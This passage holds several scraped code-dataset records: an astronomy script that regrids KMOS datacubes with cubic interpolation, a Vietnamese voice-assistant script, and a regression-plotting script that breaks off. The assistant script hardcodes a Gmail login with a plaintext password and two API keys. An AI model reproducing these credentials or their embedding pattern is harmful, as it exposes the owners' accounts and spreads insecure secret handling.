np.meshgrid(x,y)\n\nprint(Xi.shape)\nprint(Yi.shape)\n\nkmos_005 = np.empty([len(kmos_02),4*trial.shape[0],4*trial.shape[1]])\nprint(kmos_005.shape)\nfor i in range(len(kmos_02)):\n kmos_005[i] = 
 +{"seq_id": "53556666", "text": "import numpy as np\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom astropy.io.fits import getheader\nfrom scipy.interpolate import griddata\nfrom copy import copy\n\"\"\"\n\n# To regrid by simply dividing the pixels in halves keeping the same values\n\ndef halfbin_regrid(array):\n    '''\n    function to regrid an array to\n    half the bin size with no interpolation\n    at all\n    '''\n\n    outKsz1=array.shape[0]*2\n    outKsz2=array.shape[1]*2\n    newarray=np.zeros((outKsz1,outKsz2))\n    for i in range(newarray.shape[0]):\n        for j in range(newarray.shape[1]):\n            newarray[i,j]=array[np.int(np.round((i-0.5)/2.)),np.int(np.round((j-0.5)/2.))]\n\n    return newarray\n\ndef halfbin_regrid_cube(cube,flux=False):\n    '''\n    function to regrid a cube to\n    half the bin size with no interpolation\n    at all\n    '''\n    cube2=cube.tolist()\n    for i in range(len(cube)):\n\n        cube2[i]=halfbin_regrid(cube[i].copy())\n        if flux==True:\n            cube2[i]=cube2[i]*np.sum(cube[i])/np.sum(cube2[i])\n\n    cube2=np.array(cube2)\n\n    return cube2\n\npath = \"/Users/jespejosalcedo/Dropbox/PhD/My_AM_code/Gaussian_fit/COS4_08515\"\n\n#load the KMOS3D datacube\nkmos_02 = fits.open(f\"{path}/COS4_08515_K.fits\")[1].data\nkmos_02[np.isnan(kmos_02)] = 0\n\n#kmos_005 = fits.open(f\"{path}/COS4_08515_005.fits\")[0].data\n\n#regrid the cube, with *rough* flux conservation\nkmos_01 = halfbin_regrid_cube(kmos_02.copy(),flux=False) # Regrid to 0.1\"/pix\nkmos_005 = halfbin_regrid_cube(kmos_01.copy(),flux=False) # Regrid to 0.05\"/pix\n\nhdr = fits.Header()\nhdr = getheader(f\"{path}/COS4_08515_K.fits\",1)\nhduprim = fits.PrimaryHDU(data=kmos_005,header=hdr)\nhdul = fits.HDUList([hduprim])\nhdul.writeto(f'{path}/COS4_08515_005.fits', overwrite=True)\n\"\"\"\n\n# To regrid by using cubic spline interpolation on the datacube\n\npath = \"/Users/jespejosalcedo/Dropbox/PhD/My_AM_code/Gaussian_fit/GS4_29868\"\n\n#load the KMOS3D datacube\nkmos_02 = fits.open(f\"{path}/GS4_29868_K.fits\")[1].data\nkmos_02[np.isnan(kmos_02)] = 0\n\ntrial = kmos_02[682]\n\nprint(trial.shape)\n\nx = np.linspace(0,trial.shape[1],trial.shape[1])\ny = np.linspace(0,trial.shape[0],trial.shape[0])\nX, Y = np.meshgrid(x,y)\n\nprint(X.shape)\nprint(Y.shape)\n\nx = np.linspace(0,trial.shape[1],4*trial.shape[1])\ny = np.linspace(0,trial.shape[0],4*trial.shape[0])\nXi, Yi = np.meshgrid(x,y)\n\nprint(Xi.shape)\nprint(Yi.shape)\n\nkmos_005 = np.empty([len(kmos_02),4*trial.shape[0],4*trial.shape[1]])\nprint(kmos_005.shape)\nfor i in range(len(kmos_02)):\n    kmos_005[i] = griddata((X.ravel(),Y.ravel()),kmos_02[i].ravel(), (Xi, Yi), method='cubic')\n\ngrid_z2 = griddata((X.ravel(),Y.ravel()),trial.ravel(), (Xi, Yi), method='cubic')\n\nfig, (ax1,ax2) = plt.subplots(figsize=(8,4),ncols=2)\n\nplot = ax1.imshow(trial, cmap=mpl.cm.RdYlBu_r, interpolation='none', origin='lower')\nfig.colorbar(plot, ax=ax1)\n\nplot = ax2.imshow(grid_z2, cmap=mpl.cm.RdYlBu_r, interpolation='none', origin='lower')\nfig.colorbar(plot, ax=ax2)\nplt.show()\n\nhdr = fits.Header()\nhdr = getheader(f\"{path}/GS4_29868_K.fits\",1)\nhduprim = fits.PrimaryHDU(data=kmos_005,header=hdr)\nhdul = fits.HDUList([hduprim])\nhdul.writeto(f'{path}/GS4_29868_005.fits', overwrite=True)\n", "sub_path": "Gaussian_fit/GS4_29868/regrid_cubes_full.py", "file_name": "regrid_cubes_full.py", "file_ext": "py", "file_size_in_byte": 3218, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "astropy.io.fits.open", "line_number": 69, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 90, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.cm", "line_number": 99, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 102, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "astropy.io.fits.Header", "line_number": 106, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 106, "usage_type": "name"}, {"api_name": "astropy.io.fits.getheader", "line_number": 107, "usage_type": "call"}, {"api_name": "astropy.io.fits.PrimaryHDU", "line_number": 108, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 108, "usage_type": "name"}, {"api_name": "astropy.io.fits.HDUList", "line_number": 109, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 109, "usage_type": "name"}]}
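Editor's aside: a toy end-to-end run of the scipy.interpolate.griddata call the regridding record above applies slice by slice, upsampling a 4x4 plane to 8x8 with cubic interpolation (the sine/cosine plane is a stand-in for one wavelength slice):

import numpy as np
from scipy.interpolate import griddata

x = np.linspace(0.0, 1.0, 4)
X, Y = np.meshgrid(x, x)
Z = np.sin(X) * np.cos(Y)                  # stand-in for one datacube slice
xi = np.linspace(0.0, 1.0, 8)
Xi, Yi = np.meshgrid(xi, xi)
Zi = griddata((X.ravel(), Y.ravel()), Z.ravel(), (Xi, Yi), method='cubic')
print(Zi.shape)   # (8, 8)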
 +{"seq_id": "538292914", "text": "import os\nimport playsound\nimport speech_recognition as sr\nimport time\nimport sys\nimport ctypes\nimport wikipedia\nimport datetime\nimport json\nimport re\nimport webbrowser\nimport smtplib\nimport requests\nimport urllib\nimport urllib.request as urllib2\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import strftime\nfrom gtts import gTTS\nfrom youtube_search import YoutubeSearch\nimport pyttsx3\n\nwikipedia.set_lang('vi')\nlanguage = 'vi'\n\n\n# path = ChromeDriverManager().install()\n\n# convert text to speech\ndef speak(text):\n    print(\"Trợ Lý ảo: \", text)\n\n    engine = pyttsx3.init()\n    voices = engine.getProperty('voices')\n    rate = engine.getProperty('rate')\n    volume = engine.getProperty('volume')\n    engine.setProperty('volume', volume - 0.0)  # from 0.0 -> 1.0\n    engine.setProperty('rate', rate - 50)\n    engine.setProperty('voice', voices[1].id)\n    engine.say(text)\n    engine.runAndWait()\n\n\n    # tts = gTTS(text=text, lang=\"vi\", slow=False)\n    # tts.save(\"sound.mp3\")\n    # playsound.playsound(\"sound.mp3\", True)\n    # os.remove(\"sound.mp3\")\n\n\n# convert speech to text\ndef get_audio():\n    ear_robot = sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"Trợ Lý Ảo: Đang nghe ! -- __ -- !\")\n\n        ear_robot.pause_threshold = 4\n        audio = ear_robot.listen(source)\n        # audio = ear_robot.listen(source, phrase_time_limit=5)\n    try:\n        text = ear_robot.recognize_google(audio, language=\"vi-VN\")\n        print(\"Tôi: \", text)\n        return text\n    except:\n        print(\"Trợ Lý Ảo: Lỗi Rồi ! ... !\")\n        return 0\n\n\ndef get_audio_2():\n    ear_robot = sr.Recognizer()\n    with sr.Microphone() as source:\n        ear_robot.pause_threshold = 2\n        print(\"Đang nghe ===========================\")\n        audio = ear_robot.listen(source)\n    try:\n        text = ear_robot.recognize_google(audio, language=\"vi-VN\")\n    except:\n        speak(\"Nhận dạng giọng nói thất bại. Vui lòng nhập lệnh ở dưới\")\n        text = input(\"Mời nhập: \")\n    return text.lower()\n\n\ndef stop():\n    speak(\"Hẹn gặp lại sau nha ! ... \")\n\n\ndef get_text():\n    for i in range(3):\n        text = get_audio()\n        if text:\n            return text.lower()\n        elif i < 2:\n            speak(\"Trợ Lý Ảo không nghe rõ bạn nói. Vui lòng nói lại nha !\")\n    time.sleep(3)\n    stop()\n    return 0\n\n\ndef hello(name):\n    day_time = int(strftime('%H'))\n    if 0 <= day_time < 11:\n        speak(f\"Chào bạn {name}. Chúc bạn buổi sáng tốt lành.\")\n    elif 11 <= day_time < 13:\n        speak(f\"Chào bạn {name}. Chúc bạn có một buổi trưa thật vui vẻ.\")\n    elif 13 <= day_time < 18:\n        speak(f\"Chào bạn {name}. Chúc bạn buổi chiều vui vẻ.\")\n    elif 18 <= day_time < 22:\n        speak(f\"Chào bạn {name}. Tối rồi, Bạn đã cơm nước gì chưa ?\")\n    elif 22 <= day_time <= 23:\n        speak(f\"Chào Bạn {name}. Muộn rồi bạn nên đi nghủ sớm nha.\")\n    else:\n        speak(f\"Thời gian bên tôi chưa đúng hoặc gặp lỗi. Bạn nên xem lại nha.\")\n\n\ndef get_time(text):\n    now = datetime.datetime.now()\n    if 'giờ' in text:\n        speak(f\"Bây giờ là {now.hour} giờ {now.minute} phút {now.second} giây\")\n    elif \"ngày\" in text:\n        speak(f\"hôm nay là ngày {now.day} tháng {now.month} năm {now.year}\")\n    else:\n        speak(\"Lý Hành chưa hiểu ý bạn.\")\n\n\ndef open_application(text):\n    if \"google\" in text:\n        speak(\"Mở Google Chrome\")\n        os.system(\"C:\\\\Users\\\\ASUS\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\")\n    elif \"word\" in text:\n        speak(\"Mở Microsoft Word\")\n        os.system(\"C:\\\\Users\\\\ASUS\\\\Desktop\\\\Word.lnk\")\n    elif \"cốc cốc\" in text:\n        speak(\"Mở Cốc Cốc\")\n        os.system(\"C:\\\\Users\\\\ASUS\\\\AppData\\\\Local\\\\CocCoc\\\\Browser\\\\Application\\\\browser.exe\")\n    else:\n        speak(\"Ứng dụng chưa cài đặt. Vui Lòng cài đặt cho tui nha !\")\n\n\ndef open_website(text):\n    reg_ex = re.search('mở (.+)', text)\n    if reg_ex:\n        domain = reg_ex.group(1)\n        url = \"https://www.\" + domain\n        webbrowser.open(url)\n        speak(\"Trang web bạn yêu cầu đã được mở. \")\n        if input(\"Nếu muốn tiếp tục thì nhấn q: \") == \"q\":\n            pass\n        return True\n    else:\n        return False\n\n\ndef open_google_and_search(text):\n    search_for = str(text).split(\"kiếm\", 1)[1]\n    url = f\"https://www.google.com/search?q={search_for}\"\n    webbrowser.get().open(url)\n    speak(\"Đây là thông tin bạn cần tìm\")\n\n\ndef open_google_and_search2():\n    speak(\"Nói thứ bạn cần tìm kiếm trên google\")\n    search = str(get_text()).lower()\n    url = f\"https://www.google.com/search?q={search}\"\n    webbrowser.get().open(url)\n    speak(\"Đây là thông tin bạn cần tìm\")\n\n\ndef send_email(text):\n    speak(\"Bạn gửi email cho ai vậy nhỉ ?\")\n    recipient = get_text()\n    if \"minh\" in recipient:\n        speak(\"Nói cho tôi nội dung email bạn muốn gửi ! ... >\")\n        content = get_text()\n        mail = smtplib.SMTP(\"smtp.gmail.com\", 587)\n        mail.ehlo()\n        mail.starttls()\n        mail.login(\"itaisv1999@gmail.com\", \"test7777\")\n        mail.sendmail(\"itaisv1999@gmail.com\",\n                      \"huyph11247@gmail.com\", str(content).encode(\"utf-8\"))\n        mail.close()\n        speak(\"Email của bạn đã được gửi. Bạn vui lòng kiểm tra lại giúp ! >\")\n    else:\n        speak(\"Lý Hành không hiểu bạn muốn gửi email cho ai ...\")\n\n\ndef current_weather():\n    speak(\"Bạn muốn xem thời tiết ở đâu ạ.\")\n    # base URL for fetching weather data\n    ow_url = \"http://api.openweathermap.org/data/2.5/weather?\"\n    # store the city name in the variable city\n    city = get_text()\n    # if city is falsy, leave it alone and do nothing for now\n    if not city:\n        pass\n    # api_key obtained from OpenWeatherMap\n    api_key = \"b4750c6250a078a943b3bf920bb138a0\"\n    # build the query URL for the city's weather\n    call_url = ow_url + \"appid=\" + api_key + \"&q=\" + city + \"&units=metric\"\n    # request the URL built above to fetch the weather data\n    response = requests.get(call_url)\n    # parse the weather payload as JSON and store it in data\n    data = response.json()\n    # if we did not hit a 404 error, inspect and extract the data\n    if data[\"cod\"] != \"404\":\n        # take the value of the \"main\" key\n        city_res = data[\"main\"]\n        # current temperature\n        current_temperature = city_res[\"temp\"]\n        # current pressure\n        current_pressure = city_res[\"pressure\"]\n        # current humidity\n        current_humidity = city_res[\"humidity\"]\n        # sunrise/sunset times\n        suntime = data[\"sys\"]\n        # sunrise time\n        sunrise = datetime.datetime.fromtimestamp(suntime[\"sunrise\"])\n        # sunset time\n        sunset = datetime.datetime.fromtimestamp(suntime[\"sunset\"])\n        # extra information\n        wthr = data[\"weather\"]\n        # weather description\n        weather_description = wthr[0][\"description\"]\n        # store the current system time in now\n        now = datetime.datetime.now()\n        # present the information to the user\n        content = f\"\"\"\n        Hôm nay là ngày {now.day} tháng {now.month} năm {now.year}\n        Mặt trời mọc vào {sunrise.hour} giờ {sunrise.minute} phút\n        Mặt trời lặn vào {sunset.hour} giờ {sunset.minute} phút\n        Nhiệt độ trung bình là {current_temperature} độ C\n        Áp suất không khí là {current_pressure} héc tơ Pascal\n        Độ ẩm là {current_humidity}%\n        \"\"\"\n        speak(content)\n    else:\n        # if the city name is wrong, speak the message below\n        speak(\"Không tìm thấy địa chỉ của bạn\")\n\n\ndef play_youtube():\n    speak(\"Nói nội dung bạn muốn tìm trên youtube\")\n    search = get_text()\n    url = f\"https://www.youtube.com/search?q={search}\"\n    webbrowser.get().open(url)\n    speak(\"Đây là thứ mà tôi tìm được bạn xem qua nhé\")\n\n\ndef play_youtube_2():\n    speak(\"Nói nội dung bạn muốn tìm trên youtube\")\n    search = get_text()\n    while True:\n        result = YoutubeSearch(search, max_results=10).to_dict()\n        if result:\n            break\n    url = f\"https://www.youtube.com\" + result[0]['url_suffix']\n    webbrowser.get().open(url)\n    speak(\"Đây là thứ mà tôi tìm được bạn xem qua nhé\")\n    print(result)\n\n\n# url = 'https://api.unsplash.com/photos/random?client_id=' + \\\n#     api_key\ndef change_wallpaper():\n    api_key = \"XFyV6boeltUQBb9ROo5nPsWWvoPPDCPLRSwMaO_IXc4\"\n    url = 'https://api.unsplash.com/photos/random?client_id=' + \\\n        api_key  # pic from unsplash.com\n    f = urllib2.urlopen(url)\n    json_string = f.read()\n    f.close()\n    parsed_json = json.loads(json_string)\n    photo = parsed_json['urls']['full']\n    # Location where we download the image to.\n    urllib2.urlretrieve(photo, \"D:\\\\Download____CocCoc\\\\a.png\")\n    image = os.path.join(\"D:\\\\Download____CocCoc\\\\a.png\")\n    ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)\n    speak(\"Hình nền máy tính bạn đã được thay đổi. Bạn ra home xem có đẹp không nha ?\")\n\n\ndef play_music(path):\n    # path holds the directory that contains the music files\n    myPATH = path\n    # list the music files\n    ds = os.listdir(myPATH)\n    # loop over and play each track\n    for i in ds:\n        print(\"\\nĐang phát bài : \" + i)\n        os.system(myPATH + \"\\\\\" + i)\n        print(\"\\nĐã phát xong bài : \\t\\t\" + i)\n\n\ndef tell_me_about():\n    try:\n        speak(\"Hãy nói cho tôi nghe Bạn muốn tìm gì ạ ?\")\n        text = get_text()\n        contents = wikipedia.summary(text).split('\\n')\n        speak(contents[0])\n        dem = 0\n        for content in contents[1:]:\n            if dem < 2:\n                speak(\"Bạn có muốn biết thêm không ???\")\n                ans = get_text()\n                if 'có' not in ans:\n                    break\n                dem += 1\n            speak(content)\n        speak(\"Đây là nội dung tôi vừa tìm được cảm ơn bạn đã lắng nghe\")\n    except:\n        speak(f\"{name} không định nghĩa được thuật ngữ của bạn !!!\")\n\n\ndef help_me():\n    speak(f\"\"\"\n    {robot_name} có thể giúp bạn thực hiện các việc sau đây:\n    1. chào hỏi\n    2. Hiển thị giờ\n    3. Mở website, ứng dụng desktop\n    4. Tìm kiếm với google\n    5. Gửi email\n    6. Dự báo thời tiết\n    7. Tìm kiếm video với youtube\n    8. Thay đổi hình nền máy tính\n    9. Định nghĩa với từ điển bách khoa toàn thư ( Wikipedia )\n    10. Mở nhạc trong máy bạn\n    \"\"\")\n\ndef main_brain():\n    speak(\"Xin chào. Bạn tên là gì ?\")\n    global robot_name\n    robot_name = \"Lý hành\"\n    global name\n    name = get_text()\n    if name:\n        speak(f'Xin chào bạn {name}.')\n        speak(f'Bạn cần LÝ HÀNH giúp gì không ạ ?')\n        while True:\n            text = get_text()\n\n            if not text:\n                break\n            elif ('tạm biệt' in text) or ('hẹn gặp lại' in text):\n                stop()\n                break\n            elif \"chào trợ lý\" in text:\n                hello(name)\n            elif \"hiện tại\" in text:\n                get_time(text)\n\n            elif \"mở\" in text:\n\n                if '.' in text:\n                    open_website(text)\n                elif \"mở nhạc\" in text:\n                    speak(\"Ok. 
Tôi bắt đầu mở nhạc đây\")\n play_music(r\"D:\\testcode\\youtube\\music_youtube\")\n else:\n open_application(text)\n\n elif \"tìm kiếm\" in text:\n if str(text).split(\"kiếm\", 1)[1] == \"\":\n open_google_and_search2()\n else:\n open_google_and_search(text)\n elif (\"email\" in text) or (\"mail\" in text) or (\"gmail\" in text):\n send_email(text)\n elif \"thời tiết\" in text:\n current_weather()\n elif 'youtube' in text:\n speak(\"Bạn muốn tìm kiếm đơn giản hay phức tạp\")\n yeu_cau = get_text()\n if \"đơn giản\" in yeu_cau:\n play_youtube()\n if input():\n pass\n elif \"phức tạp\" in yeu_cau:\n play_youtube_2()\n if input(\"Tiếp tục y/n: \") == \"y\":\n pass\n elif \"hình nền\" in text:\n change_wallpaper()\n elif \"định nghĩa\" in text:\n tell_me_about()\n elif \"có thể làm gì\" in text:\n help_me()\n else:\n speak(f\"Chức năng chưa có. Bạn vui lòng chọn lại chức năng đã có trong menu nha ! \")\n\nmain_brain()\n", "sub_path": "ai3.py", "file_name": "ai3.py", "file_ext": "py", "file_size_in_byte": 13457, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "wikipedia.set_lang", "line_number": 24, "usage_type": "call"}, {"api_name": "pyttsx3.init", "line_number": 34, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 53, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 54, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 70, "usage_type": "call"}, {"api_name": "speech_recognition.Microphone", "line_number": 71, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 94, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 128, "usage_type": "call"}, {"api_name": "os.system", "line_number": 131, "usage_type": "call"}, {"api_name": "os.system", "line_number": 134, "usage_type": "call"}, {"api_name": "re.search", "line_number": 140, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 144, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 156, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 164, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 174, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 200, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 216, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 216, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 218, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 218, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 224, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 224, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 244, "usage_type": "call"}, {"api_name": "youtube_search.YoutubeSearch", "line_number": 252, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 256, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 267, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 267, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 270, "usage_type": "call"}, 
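The current_weather routine in the script above follows the usual OpenWeatherMap request/response pattern: build the query URL, fetch JSON with requests, then read the "main" and "sys" sections. A minimal standalone sketch of that same call, assuming only the requests package; the API key and city below are placeholders, not values taken from this script:

import datetime
import requests

API_KEY = "YOUR_OWM_KEY"  # placeholder, not a real key
city = "Hanoi"            # hypothetical city name
url = ("http://api.openweathermap.org/data/2.5/weather?"
       "appid={}&q={}&units=metric".format(API_KEY, city))
data = requests.get(url).json()
if data["cod"] != "404":  # OpenWeatherMap signals unknown cities with cod == "404"
    sunrise = datetime.datetime.fromtimestamp(data["sys"]["sunrise"])
    print(data["main"]["temp"], data["main"]["pressure"],
          data["main"]["humidity"], sunrise)

OpenWeatherMap reports sunrise and sunset as Unix timestamps, which is why the script converts them with datetime.datetime.fromtimestamp before formatting the spoken message.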
{"api_name": "urllib.request.urlretrieve", "line_number": 273, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 273, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 274, "usage_type": "call"}, {"api_name": "os.path", "line_number": 274, "usage_type": "attribute"}, {"api_name": "ctypes.windll.user32.SystemParametersInfoW", "line_number": 275, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 275, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 283, "usage_type": "call"}, {"api_name": "os.system", "line_number": 287, "usage_type": "call"}, {"api_name": "wikipedia.summary", "line_number": 295, "usage_type": "call"}]} +{"seq_id": "93170524", "text": "# include flake8, black\n\nimport argparse\nimport os\n\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sympy import latex, Symbol\n\n\ndef regression_2d(x, y, deg, lam):\n \"\"\"\n Find regression assumption for 2D data.\n\n Parameters:\n x : ndarray\n First input.\n y : ndarray\n Second input. Should have the same number of dimensions as x.\n deg : int\n Degree for x in regression function.\n lam : float\n Normalization coefficient.\n\n Returns:\n w : ndarray\n Regression function coefficient.\n # For example\n deg = 3, w = [1,2,3,4]\n -> it means \"f = 1 + 2x + 3x^2 + 4x^3\".\n \"\"\"\n\n phi = np.array([[p ** i for i in range(deg + 1)] for p in x])\n w = np.linalg.inv(phi.T @ phi + lam * np.eye(deg + 1)) @ phi.T @ y\n return w\n\n\ndef regression_3d(x, y, z, deg_x, deg_y, lam):\n \"\"\"\n Find regression assumption for 3D data.\n\n Parameters:\n x : ndarray\n First input.\n y : ndarray\n Second input. Should have the same number of dimensions as x.\n z : ndarray\n Third input. 
Should have the same number of dimensions as x and y.\n deg_x : int\n Degree for x in regression function.\n deg_y : int\n Degree for y in regression function.\n lam : float\n Normalization coefficient.\n\n Returns:\n w : ndarray\n Regression function coefficient.\n # For example\n deg_x = 3, deg_y = 2, w = [1,2,3,4,5,6]\n -> it means \"f = 1 + 2x + 3x^2 + 4x^3 + 5y + 6y^2\".\n \"\"\"\n\n phi_x = np.array([[p ** i for i in range(deg_x + 1)] for p in x])\n phi_y = np.array([[p ** (i + 1) for i in range(deg_y)] for p in y])\n phi = np.hstack([phi_x, phi_y])\n w = np.linalg.inv(phi.T @ phi + lam * np.eye(deg_x + deg_y + 1)) @ phi.T @ z\n return w\n\n\ndef latexfunc(w, deg_x, deg_y=None):\n \"\"\"\n Convert w (regression function coefficient) into function as LaTeX style.\n\n Parameters:\n w : ndarray\n Regression function coefficient.\n # For example\n deg_x = 3, deg_y = 2, w = [1,2,3,4,5,6]\n -> it means \"f = 1 + 2x + 3x^2 + 4x^3 + 5y + 6y^2\".\n deg_x : int\n Degree for x in regression function.\n deg_y : int\n Degree for y in regression function.\n\n Returns:\n f : str\n Function as LaTeX.\n \"\"\"\n\n x = Symbol(\"x\")\n f = 0\n for i in range(deg_x + 1):\n f += round(w[i], 2) * x ** i\n if deg_y is not None:\n y = Symbol(\"y\")\n for i in range(deg_y):\n f += round(w[deg_x + i + 1], 2) * y ** (i + 1)\n f = latex(f)\n return f\n\n\ndef my_removesuffix(str, suffix):\n \"\"\"\n A method which returns a new string with the trimmed suffix\n if the str ends with it else it will return the original string.\n\n Parameters:\n str : str\n Original string.\n suffix : str\n Trimmed suffix.\n\n Returns:\n str\n New string with the trimmed suffix.\n \"\"\"\n\n return str[: -len(suffix)] if str.endswith(suffix) else str\n\n\ndef main(args):\n \"\"\"\n fname = \"data3.csv\"\n save_fname = \"data3_2.gif\"\n deg_x = 1\n deg_y = 4\n lam = 0.00001\n \"\"\"\n\n fname = args.fname\n save_fname = args.save_fname\n deg_x = args.deg_x\n deg_y = args.deg_y\n lam = args.lam\n\n # get current working directory\n path = os.path.dirname(os.path.abspath(__file__))\n\n # For example, if fname = data1.csv, graphtitle = data1\n graphtitle = my_removesuffix(fname, \".csv\")\n\n fname = os.path.join(path, \"data\", fname)\n save_fname = os.path.join(path, \"result\", save_fname)\n\n # load csv file and convert to ndarray\n data = pd.read_csv(fname).values\n\n # if data is 2 dimensional\n if data.shape[1] == 2:\n x = data[:, 0] # load x1\n y = data[:, 1] # load x2\n\n # define coordinates for regression assumption\n reg_x = np.linspace(x.min(), x.max(), 500)\n reg_y = np.zeros_like(reg_x)\n w = regression_2d(x, y, deg_x, lam)\n # print(w)\n\n y_hat = np.zeros_like(x)\n for i in range(len(w)):\n reg_y += w[i] * reg_x ** i\n y_hat += w[i] * x ** i\n mse = round(np.mean((y - y_hat) ** 2), 3)\n\n # plot original data and regression assumption\n fig = plt.figure()\n ax = fig.add_subplot(111, xlabel=\"X\", ylabel=\"Y\")\n ax.scatter(x, y, s=12, c=\"darkblue\", label=\"observed\")\n plt.plot(reg_x, reg_y, c=\"r\", label=\"predicted\")\n ax.grid(ls=\"--\")\n ax.set_title(\n graphtitle\n + \" (deg = {0}, lam = {1}) MSE = {2:.3f}\\n\".format(deg_x, lam, mse)\n + \"$f(x) = \"\n + latexfunc(w, deg_x)\n + \"$\"\n )\n ax.legend(loc=\"best\", fontsize=10)\n plt.savefig(save_fname)\n plt.show()\n\n # if data is 3 dimensional\n elif data.shape[1] == 3:\n x = data[:, 0] # load x1\n y = data[:, 1] # load x2\n z = data[:, 2] # load x3\n\n # define coordinates for regression assumption\n reg_x = np.linspace(x.min(), x.max(), 30)\n reg_y = 
np.linspace(y.min(), y.max(), 30)\n reg_x, reg_y = np.meshgrid(reg_x, reg_y)\n reg_z = np.zeros_like(reg_x)\n w = regression_3d(x, y, z, deg_x, deg_y, lam)\n # print(w)\n\n z_hat = np.zeros_like(x)\n for i in range(deg_x + 1):\n reg_z += w[i] * reg_x ** i\n z_hat += w[i] * x ** i\n for i in range(deg_y):\n reg_z += w[deg_x + i + 1] * reg_y ** (i + 1)\n z_hat += w[deg_x + i + 1] * y ** (i + 1)\n mse = round(np.mean((z - z_hat) ** 2), 3)\n\n # plot original data and regression assumption\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n ax.scatter3D(x, y, z, s=20, c=\"darkblue\", label=\"observed\")\n ax.plot_wireframe(\n reg_x, reg_y, reg_z, color=\"red\", linewidth=0.5, label=\"predicted\"\n )\n ax.set(\n title=graphtitle\n + \"_3D (deg_x = {0}, deg_y = {1}, lam = {2}) MSE = {3:.3f}\\n\".format(\n deg_x, deg_y, lam, mse\n )\n + \"$f(x, y) = \"\n + latexfunc(w, deg_x, deg_y)\n + \"$\",\n xlabel=\"X\",\n ylabel=\"Y\",\n zlabel=\"Z\",\n )\n ax.legend(loc=\"best\", fontsize=10)\n plt.savefig(save_fname.replace(\"gif\", \"png\"))\n\n # unused\n \"\"\"\n def init():\n ax.scatter3D(x, y, z, s=20, c=\"darkblue\")\n ax.set(title=\"3D\", xlabel=\"X\", ylabel=\"Y\", zlabel=\"Z\")\n return fig\n \"\"\"\n\n def update(i):\n \"\"\"\n Move view point.\n\n Parameters:\n i : int\n Number of frames.\n\n Returns:\n fig : matplotlib.figure.Figure\n Figure viewed from angle designated by view_init function.\n \"\"\"\n\n ax.view_init(elev=30.0, azim=3.6 * i)\n return fig\n\n # animate graph\n ani = animation.FuncAnimation(fig, update, frames=100, interval=100)\n ani.save(save_fname, writer=\"pillow\")\n # ani.save(path + \"/result/data3_result3D.mp4\", writer=\"ffmpeg\", dpi=100)\n plt.show()\n\n\nif __name__ == \"__main__\":\n # process args\n parser = argparse.ArgumentParser(description=\"Regression and Regularization.\")\n parser.add_argument(\"fname\", type=str, help=\"Load Filename\")\n parser.add_argument(\"save_fname\", type=str, help=\"Save Filename\")\n parser.add_argument(\n \"-x\",\n \"--deg_x\",\n type=int,\n help=\"Degree for x 